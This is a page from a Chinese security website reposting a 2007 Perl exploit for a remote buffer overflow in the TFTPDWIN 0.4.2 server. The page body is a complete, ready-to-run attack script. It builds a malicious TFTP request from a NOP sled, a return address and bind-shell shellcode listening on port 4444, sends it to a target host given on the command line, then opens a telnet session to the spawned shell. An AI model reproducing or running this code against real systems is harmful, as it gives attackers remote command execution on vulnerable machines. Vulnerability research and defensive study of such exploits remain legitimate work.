首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TFTPDWIN 0.4.2 Remote Buffer Overflow Exploit
来源:vfocus.net 作者:vfocus 发布时间:2007-01-16  

#!/usr/bin/perl -w
use IO::Socket;

if(!($ARGV[1]))
{
print "Usage: tftpdwin-0-4-2.pl <target host> <port>\n\n";
exit;
}

$victim = IO::Socket::INET->new(Proto=>'udp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]";

my $nop0="\x90"x15;

#8BC3 MOV EAX,EBX
#66:05 1201 ADD AX,112
#50 PUSH EAX
#C3 RETN

my $asm="\x8b\xc3\x66\x05\x12\x01\x50\xc3";

my $nop="\x90"x57;

my $nop1="\x90"x7;

my $eip="\x42\xfb\x61\x40";# pop ebp,ret in tftpd.exe
#my $eip="B"x4;

#A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences
#1)bind port, in this exploit is 4444 in the original shellcode was 6666
#2)4 bytes added to the shellcode in order not to see the window of cmd.exe on remote host
$shellcode =
"\x59\x81\xc9\xd3\x62\x30\x20\x41\x43\x4d\x64".
"\x64\x99\x96\x8D\x7E\xE8\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C".
"\x8B\x09\x8B\x69\x08\xB6\x03\x2B\xE2\x66\xBA\x33\x32\x52\x68\x77".
"\x73\x32\x5F\x54\xAC\x3C\xD3\x75\x06\x95\xFF\x57\xF4\x95\x57\x60".
"\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF".
"\x47\x8B\x34\xBB\x03\xF5\x99\xAC\x34\x71\x2A\xD0\x3C\x71\x75\xF7".
"\x3A\x54\x24\x1C\x75\xEA\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B".
"\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3B\xF7\x75\xB4".
"\x5E\x54\x6A\x02\xAD\xFF\xD0\x88\x46\x13\x8D\x48\x30\x8B\xFC\xF3".
"\xAB\x40\x50\x40\x50\xAD\xFF\xD0\x95\xB8\x02\xFF\x11\x5c\x32\xE4".
"\x50\x54\x55\xAD\xFF\xD0\x85\xC0\x74\xF8\xFE\x44\x24\x2D\xFE\x44".
"\x24\x2c\x83\xEF\x6C\xAB\xAB\xAB\x58\x54\x54\x50\x50\x50\x54\x50".
"\x50\x56\x50\xFF\x56\xE4\xFF\x56\xE8";

$exploit = "\x00\x01" . $nop0 .$asm.$nop. $shellcode. $nop1 .$eip. "\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00";

print $victim $exploit;

print " + Malicious request sent ...\n";

sleep(2);

print "Done.\n";

close($victim);
$host = $ARGV[0];
print " + connect to 4444 port of $host ...\n";
sleep(3);
system("telnet $host 4444");
exit;



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Kaspersky Antivirus 6.0 Local
·KGB <= 1.9 (sesskglogadmin.
·Mac OS X 10.4.8 AppleTalk ATPs
·Mac OS X 10.4.8 Overwrite Setu
·VLC Media Player 0.8.6a Unspec
·MS Internet Explorer VML Remot
·BolinTech DreamFTP (USER) Remo
·Sami FTP Server 2.0.2 (USER/PA
·Sami FTP Server 2.0.2 (USER/PA
·MGB 0.5.4.5 (email.php id vari
·WFTPD Pro Server <= 3.25 SI
·CCRP Folder Treeview Control (
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved